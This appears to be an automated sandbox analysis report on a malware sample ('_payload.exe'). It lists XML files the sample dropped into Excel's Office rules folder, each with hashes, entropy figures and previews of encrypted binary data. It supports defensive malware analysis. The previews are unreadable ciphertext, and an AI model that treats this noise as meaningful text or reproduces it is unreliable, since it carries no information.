                                                                                                                                                                      Preview:<?xml.h."..t...\...G...b...G..q..kL.\..o.A].S.,.D.NM..M.k.p....*R./.]@t,p...Q._..,.T.[k..w.....0j..v.F;...}jY..=aHVK}..._1g*T..g].5..li...Gp..,.......lr.*?}..2.P...A.<K..@...OJZ....3.. onl.-.5..G....y(......L....~...5.{...H...5@B..3jy.?cc.]......wV..OQ......f`V....F...?...B..)......B.H.z....6..6.;.t.......$0...E.......>..........cE.n...Q<.u.9>|.av......@D.@.c..O......7`.X...#.vg..D..G.w..f?X.}.[.a^....x.....8.qt...25.W.S'oFu...............|..9p..{..._.....o...."..K.....X.b6.,!...Q.. W.+..2C.N8.<.x..`..i...o../...`.....8..}..4..d..Y(.7.FO..<....?l..E^.7........L.=...n.VJr...#-.1.5....Q..B ....P.'..8...X..xW...TEM.;.F........~...%..9&.P./.a...x....\.....2...4....%..1.._...G.........a..*..T.......D..^o....@c^.M..U.....F...l. .3......r...'(0.....e.n....H.....8........$...H3...&u.n .....e|.H.M.nY->...g....*.....K.#@...E<..~...........TB.D...w.N.&7.sMA.......<... .<....T=...@.....:Q=..o.5...6GQ.........P+..(.S......qV.e..C...OW..o..|..o.{%K

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):924
                                                                                                                                                                      Entropy (8bit):7.767070158179957
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:AQfkiZO5v+xAk3v7/6Deyj7x0/sy66jJ/Jqn9ci9krqu4O47RXWj1kZiSUdNciik:NFZe+xAk/7m0/sy6MBG90WzOJgx2bD
                                                                                                                                                                      MD5:246C0371CB66EC7F98969906711FDF2F
                                                                                                                                                                      SHA1:A22F364946332AFA5D1B1B8A9233EB447F6CF179
                                                                                                                                                                      SHA-256:A63BE51030E72368066CD034DAD85F6038A2CE853621147FC1F2CF652A063115
                                                                                                                                                                      SHA-512:BAB4CBEA1FD69DEAD6898B368E9B9065CDB24545E80034D14D93C2A93E62C017F083BAB9F99E8BF053D91D94798C28C9F154BC74A1B8A6C70885670C15B1294A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.y.CH...\..Y...'... .j.p.cv..../..@..........v..\".gn..\.c.2.e......-E...u..0wB..|.1..d.I...%..0.>,"....g...A..d..F^..........Q7&..Q.%.d8=........8....SR.t!J..@P.w. ..:_....yh...q......c.."3.p..........C..|#.....nd..qS+.~..,|..,..z.......x=..A......I......o.5..*Y..rHY.xd\.3..# ]X...j.+.|.r.!._U*.|.N...)w.%....5-........Q..=,O.!..(.....|..pw.....1i>.1.M..F.-.3.........gU...3.n5..p..Jn..G..h.V:.R....l.b..jH.Q....o...v..U..=..y}|Y...xZ^...........3.%....d.....v.q-........P.V8}QB\x.G.w\..>~...T.p...b.......e...........q./d..}.t..Z..h....H...X.n...CI...q%Q...J.......A.i...:.W....i+..+..#+....oP.dx.c...W.....|*.?.P.E.fqeNS....2....|......6&=.V..y-G.|..xg.g.B..h$[.$OB!...4].._...V:.D][..}..t.d.-}..v..g0...f.L.^v.?..........-\F.A\......j"M..O..*..>..K.o.o|<..u}.I{G..{.I........_.......a..*EmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1090
                                                                                                                                                                      Entropy (8bit):7.824325953154932
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aOJnGG7Cjk0CfLc602CWLfsLojujk3kF/sMMGfUWmAXDlM2bD:up6Dc602X7sN1FlfUWHDlfD
                                                                                                                                                                      MD5:9FB884742CFD7E3B57481706DE376543
                                                                                                                                                                      SHA1:109B8BBEDFC1CE9C4F2CAE1A22DDB44B734F4F1B
                                                                                                                                                                      SHA-256:C135263B8BD12F53BD983608C83787A7C9786E958EDF2B44ACA58BA026CACE59
                                                                                                                                                                      SHA-512:9FBA0E8BD87A0DB63D77E272EEEA960C1137545FD42F4D7B545ED846D65FC7642F5F522F59D3E4D4360F342B803E814356577D858E7AA7D7C684D20E7437A617
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......i....IyF#+..-eF..w(.F..K.i...ok.!|.:..Ic..D..I...\....S....-...2.}.d%c.i..q........X.y.+....>7.s..J....0..X....Y....1...../.F.."v....j..E...!\....p....I&.du9.s.Q..Y..C.|..|.X....6../......4./...E..A..,....8..*...."'].J...G6..6Z...5..B).Q..$.5.....d...X......o.....L.he.V$;....D.C..".(X....iz~.M]...Q......._~p..^.....(...>iJP............E.G...n....f-..Z...~JT....?*......$..%.......).I.....7N.#...o..$.%O;..2g..o/A.2lK....=..._\dJ..6Dv.n;t."sX.W^..3X2.e...T0w.\.X.(..l.$b.j......Q%..]..F./c.F....:~..3.......X....E.....W3..W.9..s.d3.&...g...d.o$..l4.T~....3....=kob,...|..w~G.%.........+.s. OuI......m..N..RZ+.F.+1.w..G..9...eC.9.$.p.|.'.-.....u.T..5.K...r=...2|...X.h%....I..D.%,LqCd..x.C...d.t....[..u[.X5.U.z:.,...N][.Fz{M.....8%..i.+8...".._...9.j$...u.aSd...EU@.2R.t...$wL..?6E.Z.A..........j.o...Z-Ba.......7.\...I.......r..?.Qz.R.#..A.........(..}A.h...>.........@,.1..t..B8,...Z.a...a..%...%Y.X..N.v......n}X...}/....l.Q\.P .N....@.#8S.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v4.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1090
                                                                                                                                                                      Entropy (8bit):7.849546919697584
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UN++Ltfk2hqTrBGlQMtwHqjP/0GwpmPpUthQxRrMGO1Jf28IAdDeo2bD:UoItfZYrBGP7bwpmRr5KvIuebD
                                                                                                                                                                      MD5:DE4840CF60854C079E60EE2A8D5071C1
                                                                                                                                                                      SHA1:EC97F9F4387FF434ADC9DE1CDAD1EFBC06E8C164
                                                                                                                                                                      SHA-256:2882B5E650B3696F68DE6C83899959D66E7E54CABABBB3F35062901512B0EC18
                                                                                                                                                                      SHA-512:6101095826A073B6B5C37FDC86E7EDADBCC51066E54FEBC5A9147EF7C9DCCDA04B2B85CFA1ACA0EF6C5200F4927AC943B185F9EF4073C16972BC08D14638C706
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml>.J..i.?TI..c.e...|...8.=W...E#A.xm.G..)&...S.5..&pi0.I..X...X.b'g.......)........"-E.D#/J........I+\..X...:..Y>4Z..!wl.Q"N...V.+zk..Wy......#v.-....1_......b....M..;...b.n`1x`.(....m..../.t.Y.W.J....5&.zF.#.7O.d.p.5.-...h..[.M.Q......._%.o.%d.).T.........Qt..Q..+s:...._0M^V.P&..r.=.[....1L.......@.%....y:r.N8.Z...U.....5se..C.`.T...?. t.H1S.[...r..x....q.d..8E.p..oz..I.MD.;f..P`..B.J^....,,..NU...tIo....i$MC.4.;.<=.....:#6.b.F...f.oS..r<...A.........Q..'...m}])k.$F]c.W.?e....p.y...n.'..x..e....}cS.7.).KtiD..kj..H..&l....Xj.......M.a....Rb. X..E..-#...[*.g...v..A].p..d...8.fP..%W..85.....v..k..........(S.wZX..zH3X.Oy.....DCA.......5.....3l.R...Lc7..K...Y4i-.d.>..z....4C..N.+...C.n.A.G.....|..0......k...M]f..v+'e..9....Vs..G.\u.K..e.......sK....!...).wT.fw.H.>n........i...*I.l[2M.w..W...@Zi.@.A.c.Z.......O...};.~Lh.....\..R.J..!;q.....A..zl...x.Iu2..>.X.g.+$.0.}7i<....L.......<..,E..pU..TO....65....."./.Q......]{.z.r.....e....B...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1108
                                                                                                                                                                      Entropy (8bit):7.81120927364214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0IhIqPYHp07zA9zRRCS3axKj1cqCZs9zmQu7fo62D2bD:cgYy7zyz3CAaxKjFMeyQu7/jD
                                                                                                                                                                      MD5:04EA5C5555FF884385AAA1F72ACC28AB
                                                                                                                                                                      SHA1:6E3C8D0FA3063605F6F4994F4B31020037B273BE
                                                                                                                                                                      SHA-256:7FD218D68AE09590E5D14DE99156F0B13DD2F4CD5EFD798987F6A51F5A5CA9D0
                                                                                                                                                                      SHA-512:DB0324CB487CBD07678FCF60687EC76CD4F7E32BB8CFE7B093619BA3CAE015EF1CB40273197881F8DC728D0B0A9E24967A6C76A030F0ACFE3488185E2BDD2174
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.P.%X...Q.........H..\..o.f&...x..1....Rk. .....}...C...M.0 ..i..`...<...P}W..N..e(......}......*0.,..]......D~=(.LUhVT......z.4O..p^...l7i...Q.U.J..*...K'@WCq.x...\M...d....y]...}._._....... o.,.w......e.+X...xj.y.....JFL; Q......v.......3]...8.f.t....?.]..x..J.9../{...M....._S..i.B...X.XT.tu\...h%...../[.\...c..(.J@...vX......Y.1....e.C$....C..t<`....wac@*.Zr....M.r.>...+...j.?......Jg.*.......GO2b.t<.'>.\ .!).).LJ c..rL:.`R.qEq....,."...I%/..U...._...^\....Z..J>I..1%..G.....Rtn.@...`_A....G. ...<...q.$.j.x!f.Od..,(..J..:..a....`}....!..,DV..'l....>r....X.I.. E.^.d.....*.....?..]2..tP.B.W.o1......+.K..M..}..m.~.Y.....G.~K.0_%.rG.C.....w#y.M......Z..K.'......G7m[.<.....W..{.a-......5.Y.T..b`h..."g.d.^. ...?........3[.]XE|IB...z..e....S...L.xY.*..yr.._..#z@.....M.......c.fv........,...5.F...{|.......6..J".~h....j:.....~.Q...5..1u..Ss.q.$N\.rA))..m.={..2.M"...r...`&...[.>n.5w..i....W...........b.]<.i|.Wn.6............V../:....W

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490018v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                      Entropy (8bit):7.790714038760215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:zovsmorF8km0kkyIAXqW63Wm78GQ4Gm5xlZ2bD:zovGzgIAa3b780h1yD
                                                                                                                                                                      MD5:A53A334DFF95B4C1F3F2F3E6FD0BAD26
                                                                                                                                                                      SHA1:AA1B7EBADB5DD90C24540F08072B037793340832
                                                                                                                                                                      SHA-256:214A36627C701DD8E8AD0A6888C3C2E6E8E5C956B534A9280ADB2711ABAD2FA9
                                                                                                                                                                      SHA-512:6FDCA267ADF20E0D41163196F11CECCACBC28B0165B0B12CD6BF74BA14FDDE94647C1508EE58E7A13DDA5EA5B525E31CF25E07CF42D0EB81BA4FF3B0868CB1E5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlK.......A,......../S....._V.....c........&.onu.\1.h$6?)e. +<....n.. .....\....4.6.F...!..)....K.z....B.S|.....@.N+/...<,...K.....;...$.p..$.A...t.).....q.|mM.f.e.$:....3.@.Kk.7..e .g...p./.U...p...(.....a.x..r..D..~..n.UeS.x......-.k.e.oAX&...5......Z.....I`R...(vF...P.....I.....;....=y.%..5.-~..#Yw.{1..8uA...\E3#.v...D}...T....q.VK.@.a.H..2$XV..<S.?*....W.e...z.,~7.....M.KO..'...sz7'.t..ea......*s.b7..V..9E^.'B..U%...r...I".....5K......7S>..H..f...}...d0...{...A}j.3..Y..5.......e...8..rR......... .&x...*....y"'......[.C.=.........7.Nr..d.L..~....ll.^.F>........L.ePX4..%E.D.....`..S....u%....p.R.b...J.g.s......k.v.#W.r#Y.....y..si.4_.i....S"T-T!e]Cs.-.:.... .~...-.:MDw..(.>..H2..&.=...{...@F...A.b.NH....7....V$V....Z.W.,.l.I.a..Q..K.fb.H.s.e.........Y.f%...h.Q...l..`l5. @..(.nsn....M|r..".mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490020v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1126
                                                                                                                                                                      Entropy (8bit):7.819365853492535
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:WEJiMHgQLBSdSpYFb0CXS2pVGb1hkGMIm9XSFGkLPte2bD:WEMReIdqYzdVGbrkamzqD
                                                                                                                                                                      MD5:3AC394E8D206B7CE56C89AD5E059DE76
                                                                                                                                                                      SHA1:A934DA9CCBB3FA3CC4D3ECD3785E73247E6E235F
                                                                                                                                                                      SHA-256:533B5A2E6D5F1C22A258C0C57AE577AB13658BDCA00DCB7B3E80849A8C38464F
                                                                                                                                                                      SHA-512:D72EF433F8D1E0BD4C6C5A4B49C093AD7C9F59F7BF770718BEB6CF7DF617165F35674D4CA2E3848C9027366CC7702CA338E4D7C2D84AEB38B11F06291CBA403F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..$....i9.TP.x..hH.......l..,.....3...T...PDv,L....|..zN...j..).D..D.....Ku\G...R.[.O.<>..~......}.2.....G....R.]..v...>.....A..7.*....{.\7-)H[..r......7C.O..9g.1.X....*..j.EM...udx..TSGn.Z.}Y...k`.c.Z..6Th...Y.o..B8....Z...........[\..b5.sL^[Bu.N.{:..fm.+.......U.Z...8.|t7)F.?06...5n.pj.........?.$.....+:..... %...BQ..*....q....b....9.C.@;.........8o.......,.L.A~.+.Q..../..(ZL.l.t......E....u.&...g...e...[..o.!.u....c.ER7mP.........}..9.DU0..(.:x..{.^..p..Jj.WLP...U..H.......'..D.Cd..lk..0.a.Lz6g4.C...w......qe?t.<.]...t\..p..-.(...n..i.R..Oh......(...|`...6...}....h..bSz.....Yjh.+~.N. .mz"x..*y.a+.%....r.A.../e.#.....`.Q.._...Qf....(......F[.... .&.`.....N..i....W.!.^...?>..C..F.y._..S.4es1.Mj?R..=.LFd.'.*.`6.....]..-...).Ly_.B.........3o6.@..."...[p..&....H...o...L...+.....Y..N<dY....../..|..F..J.G.9}8ukr........U..,..vv(......c.d....4..6M..n..[.e.E.e..w.l.\U.R._...y.._.j.....X.H<3..r.......4..S."..J*.WP>vaZ\..J...HbSS..1w...|.*#..U.W9.=)

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490023v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1243
                                                                                                                                                                      Entropy (8bit):7.837551064746857
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:vwobWZUVEYKv/Ggm6gsG5aI7yuDqJPkt3ADfxU2ztdZwiAAGz/vJ2bD:4oCWVEXXwrssp7yuDSPk9mfxUIkOD
                                                                                                                                                                      MD5:C036F927758D9705AB86BB435292ACE9
                                                                                                                                                                      SHA1:162687B6D7740DB3E4E1D12E3221E1FA10E237A2
                                                                                                                                                                      SHA-256:215B9277CB959FBE155C03B77A76F3C5F499AAEC77A01E7565B98877299E36EF
                                                                                                                                                                      SHA-512:A75E0C7576CCEA372DE7402DE2B1D881DAAC982191F98BE4F8F5DC93D930258C5216AB2C5B2ED17024D67DD419A6C77CBA446EF9C50C8DCAC0C8B7C18FE72E29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlC.G{....}...h.0!QO...4]..:.!+.[.`..D,).X.k2...J..6...}....>..'@......{...l3..c...V.5_G.D.S..B.....,.].....n... .............*n3....1.\W....&.-..R..F~. y...p.(Y^.w.{n.../0.p.....E\..C9.....d.........N5\.Y8.W-X.../..j.3..r.........B.O.....=D..H..}......>3...=&.KY...,.,.V....M....p.1......s,..(.0.@.F.3eE.6#@{i..m.9.Dc..KS...r.h.*J8Y.h....,v..`.).l..F..U...0w2&..f.V......h...;..K{.....&..B..9.....E.]....WU;.}F........X.m.X.L....7...,M..>.E.#.~9J...w..c.h..G.J..t..b.+."..P.....i}....!hRi........<~....ut..._.Vb..&.@z*.........;..;...|............!4.\./S...ch.....<....o.r..O.Q.Y~.$...THC..Zv9........3......#.....E[.....`.[Y..SJC...%..yuD..'R.A.u.....+j6 .O..d...1...Q.7..]..w.Az.8.N..l.^...<..w.i.a.B...h......`..{-.l.B...I(.t].....R....ftn.8...VF...1......C.x<.....,o..#..g..S. l.....#.I|.....I.p...............K....~..h[..ZP..m%lrL~......=..*._#.E...LK0&....r..Q....G.=..d..c........Z.. 8.1`X.YM...U.F.U..4......l.[..}s.....Wl:...:G.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490024v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):871
                                                                                                                                                                      Entropy (8bit):7.722847234888786
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:OQhTYr6LGhLFJn2xAhNEw0w/n+PoMehVRTkjS8kq7bvTd107uT2bD:OzrFTxNgw/n8WVRTku8kkbrde9D
                                                                                                                                                                      MD5:093645DBA273314BA4D13FB740CC73F4
                                                                                                                                                                      SHA1:194002DD23D2FC2EE6EB0070F41C024CBBDAA520
                                                                                                                                                                      SHA-256:92AAB8973E1B10269608BB48A7D55147389735833D228B78E33D5E138C3F6DD7
                                                                                                                                                                      SHA-512:34F79E6994AA7509276CB8D92CC6B326577068E5EDDE687177A9178C75C4BFE96C5D44308E723FAA403DBB829FDD688888C0D33B268664DD9A723112F35C9AEC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.;J{.lO.....SCbG...j%o..N...S.C.E?.. ((.e..e..{N...q.F..Y..C.rQXn.f..%...j.%..].,.........W.0..f<v...f_.[..K*R/.......xmA.|..M+~}U...y0..u....0.rI...$ws...3......w.6..H..<.+G...&...P....'..9..s......\...3Z.W.:.\rL..91......s.......q.w.e....._.B...y.......X.2.?....0./y.........sqS..7#VOHx_Q....5..#}.<.VM..R&..W.^.<z...7./$..=j.>.>e..:.3..hgK.g.g@.8...F...5..h...p.zK.1.....s.*...A...@&{wghC.rjT...E`J.d...?.gx..w[...z.N.e.U.!.=.y{.}...>..............j,.=8...[O..c...Pk.2.ym$..I.....n.Ck.*..~...<.....w`..w.fsG. \...(L&.....(.wA....n..NS...Ou.p-.g.....E&.E.p.2].....T.. .H...fH...xD......#........sO. |...5=.{:..8.....%.I{...5..Z....5.gYH;0.9........a....7KC6`]..+...5.3~2..(.....H.Y_.....y.C..x7...../..X.h.......A...-.q...:~...$.......X...1._r.r...38r..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490025v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):866
                                                                                                                                                                      Entropy (8bit):7.774082036110744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:OC6w0LkyC/bmZCgGsqX3Yrc5ggsVTSh2bD:O5w0gTdpIAwD
                                                                                                                                                                      MD5:7ACB1CD25F6FE47212342614D72229F7
                                                                                                                                                                      SHA1:778D2FB48B8E1A7B14F544D7E205D9B0109D8AED
                                                                                                                                                                      SHA-256:F6E96E3FE15AF0D65058E2E67D188927B779889613DF047CE2384E28B56D345C
                                                                                                                                                                      SHA-512:762E0FF5A3785966C88634D1CC0F0A6D3F5F7728FB1FA43760D34877D2F4618E8BB4244F63C21F8509F89ED7C29CAE686B52BB084E093344C8FDC6DD48E16331
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..B.$...z.lT....UM.K.n.[g..z.pW.....S.%.(7p@e..$.R..W....#..RNb..1h.(. :..U...g(>...Ne..J.lQ.y.C.c..........+.|..!.".4..l.....Ve.....9...% 7c.3h}d.\...u..+..?.*..L._.z..Q.j356.Z.M..fvg.l..F....Y.....e..:...>.......N%.7........x.IpF..a..F...(...,..jD.......G.WC.bg`k.*....z..'.b...>l..n.Y;.=&#.k..F|.ko)x<*of`.e.....a..b4KcB4..n.`..I....c)..k.o.-."..@1k..^..30.Z.H.H....2.......+..G..7........ocRa\......kOi_..........'v.r^..m.......V..R.'."..Q.....Y..........J4..,......0..1q.=......[.lh.R....u.....wq...dC..k0.Zrk.!p.......E........v..&.T.$.........%.....$..D.u...2..)..X.[.|.&..m....1.lH.....r]w.N.....kJ..M.a..Y...'.....G6O.....u#.B.1+..y.w%a~..Z..{.o...$......dO$.....&....)..Y+a.~.....P ....u....r .u.a.`...NM...V....9.~.......-z..GmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490027v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):860
                                                                                                                                                                      Entropy (8bit):7.770003135925822
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oqqG7za3dui4Y0XabgcfubKNttaVLwhEY01IcVyDo2bD:olCwhRZ1fUKN/a1whHuVyDbD
                                                                                                                                                                      MD5:D11B11950456879DF2C9726117A29AD2
                                                                                                                                                                      SHA1:7BF873E280AD5BB518B5F90FCA030896B47AF194
                                                                                                                                                                      SHA-256:C747D1204E7D55F6D22B72A175FEF8B4777950B361C2EA13E3C032D75E0A555E
                                                                                                                                                                      SHA-512:80440A1BB2031F04C9505FDF8DD1ADE2270A95B0F7D0F8E180120ABF1F99BF4CD98E3401C313699E3C27E4366B79E319881ECE5372E4D9D41748523112EF6CC8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...m....9j%^.!....6}......F..I.....DIa.|*.L.`.Zv+..:......d.R0...r.o.q.pP.Ti.F.....2.T...f.'..J.L..H....z87..... k...........".;27..N...Z..!3..CU...k.=.../^7........^..)i.#.T..-S..d.......kBY.%k....L...&.....8......N.`...y`v[...mQw.}.pEC...I.]N.W.....*.j.Y"p...J.-!.S..5.K.RH![.k...%........O..:YV-J"..!D.y.....0.b1k..&$.-u..^.......DG.......1=YG4.C9.a.......%..Y..[I].?p..:^.f....?.....q.&...+.......h...].b..%..N.#.........w.$......U3...a_ .0........7h.W_vz.".......t..?......!......u{p..xW..l......5...))......'H8k...R...b`.Wb........]........BmV...E.c.a...$:j>.\..Y...k.s[%l.7.*..@.c..<..i..IE '..?R](E.....Sf^.s}n...#.Zbo...Y.me....M.3<..e....o}..Zz.s.!..)....d.H:kN..\.......|..c.(%..j..&.............{>?... @A.}.....2P)F.......wmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490028v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1057
                                                                                                                                                                      Entropy (8bit):7.784209499066885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YQPtKcQ1GGOtEhVTQip8iuVvc/ucp0Fv71G7f2bD:Y4tE1stEhVTvp8rvc/uLvxG8D
                                                                                                                                                                      MD5:EE66FD19EF10B496B3D6EB0519B34CE1
                                                                                                                                                                      SHA1:FC4929990678675C0704D00A46DF705D60F30ED0
                                                                                                                                                                      SHA-256:2F0B548A4F5C1971C0CDFB5E018C27D5AB06D62F42E40554DD45FB80D4D55A91
                                                                                                                                                                      SHA-512:FAC241636D1773F8BFA9D29803CD85EADD48AEEE8B41A606407B014E02CA32D57C23BE0903FEA9EF2A9381E2B6FB13F34B12B80BBB89DC94EA6E550ECD857E63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.H.52.bQ..*.-...c..S..sA..#m%.....'6...uxt-.....I!..+.Q.}.ZR....G...Z....K.......~..,4*^=2l..6j.A~....0.%..............DG+~....|..U.m....852....}...m[CE...6.ft...<d.......x!dzn.%h1..W4...5.;..p..//*ZVq.4r.L..(.x+DW.?...xJ...h..K?..0..PpmK.}..P..LD.2.o..=........t..l.t..<..,.F....V..^4.@s.R..X..G.E)._e...($"@..z...#4fQ............Xz.D..pO....M...yA.F.....H.....U....|....O.....0._..vN.......f\f.e@.?..CM;7....A....P..!..t%.s.k.<.IPN.>..^...........^..-I..o......7...".@..,..0b.Hp...>...y[.=..[$.!/R.`...,.Sh.6...\.qWw.O\.^(=..H.....!....."..O..f..K4.WJ_...X....(...O.m>..a4...nL.r..9F.%...b.9.<..k..\......z...!n:....u<M....s..j.7rx...CeK.. \{.......J.E\..J....{.f.q..."....D...v...d.3k.WYJ.K.2.?gXs3.2....f....:;o....../...t..\&....'.R;HCuR.mi.<..?Wt@=.X.}.G...."...97}..'{.C.v.N.S...:.;..y2....Oy*..{..NL....0...s..;.....bP.Q..@JL7l.s..g......z...!......S'.]......Z..m7...M$Kt_.zN..<........Z.q\M2sQ...E-..i.....mMsRxMUuXypapZbGOAfxD

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490029v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):766
                                                                                                                                                                      Entropy (8bit):7.712259757980741
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:jqoOwlyb6OEuOjuBIci2sZwHm2P/iCVrWkkxYCoe1+X/LGBIz+PwZjWSUdNcii9a:jrlqXY2sZwvVrZteA/LGc+PwZx2bD
                                                                                                                                                                      MD5:9DA34FEAB0FFD5C4597BA54FD96E41FB
                                                                                                                                                                      SHA1:244763B36B504792D16F3B4E21B62BEF2290CD1A
                                                                                                                                                                      SHA-256:ABFB147E2448A080A98CAADF09A172929E9C8FC462F017D7FCDB6F5096B08D07
                                                                                                                                                                      SHA-512:F904262F88F3FA134B9586C9AF6AE6B274AD01E7FDF67F6BD1C808C6DDE9983E5CB147B5784A165919E49737CC5CFE812FDD16843484A6D86CC6B42B0664B2FE
                                                                                                                                                                      Malicious:false
